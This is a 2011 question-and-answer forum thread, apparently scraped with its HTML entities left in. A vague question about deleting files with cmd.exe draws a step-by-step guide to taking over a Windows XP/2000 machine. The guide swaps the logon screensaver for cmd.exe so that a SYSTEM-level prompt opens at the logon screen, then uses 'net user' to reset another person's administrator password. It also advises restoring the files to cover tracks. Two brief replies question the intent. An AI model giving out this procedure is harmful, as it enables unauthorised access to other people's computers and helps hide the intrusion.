Sunday 5 June 2011

To all who know about cmd.exe-how owuld i do this?

what commands would i replace with the originals listed, if i wanted to delete some files...n stuff





1.) First if you have another account other than the system administrator and you can bring up the Windows command Shell which is cmd.exe then your ready.





2.) To open cmd.exe just click on the Start button and click RUN


type cmd.exe once you%26#039;ve done that then your in.





3.) go to the system root directory by typing %26quot;cd\%26quot; without the quotes, next type %26quot;cd\windows\system32\%26quot; OR %26quot;cd\winnt\system32%26quot;


depending on where the Windows [stuff] are located.





4.) once you see system32 at the end of the command line. (warning! here comes the hard part).





5.) start by typing %26quot;mkdir tempdir%26quot; without the qoutes press enter


next type %26quot;copy logon.scr tempdir\logon.scr%26quot; also %26quot;copy cmd.exe tempdir\cmd.exe%26quot; again no quotes, press enter after each line


(type help to understand what you are doing)





6.) next %26quot;del logon.scr%26quot; deletes original logon.scr





7.) next %26quot;rename cmd.exe logon.scr%26quot; renames cmd.exe to logon.scr





8.)%26quot;exit%26quot; quits dos





9.)Now what you have just done is told the computer to backup the command program


and the screen saver file, then edits the settings so when the machine boots the


screen saver you will get an unprotected dos prompt with out logging into XP.


Once this happens if you enter this command minus the quotes


%26quot;net user %26lt;admin account name here%26gt; password%26quot;


If the Administrator Account is called Frank and you want the password *SHEET* enter this


%26quot;net user Frank SHEET%26quot;





10.) and this changes the password on franks machine to *SHEET* and your in.


p.s: dont forget to copy the contents of temphack back into the system32 dir to cover tracks





11.) Now log off the machine, logon.scr is the screen saver that will kick in after 15 minutes of not touching the keyboard/mouse at the logon screen. Wait 15-20 minutes and a DOS prompt with FULL SYSTEM rights will pop up, then just to


C:\%26gt; net user administrator %26lt;newpassword%26gt;


and then log in with the new account.


Try this, might work, as long as he didn%26#039;t change default permissions on C:\winnt and C:\winnt\system32 you should be golden.|||What exactly is it you are wanting to delete that you can%26#039;t do with good old windows explorer?|||you going to mess you computer up if you don%26#039;t know what your doing.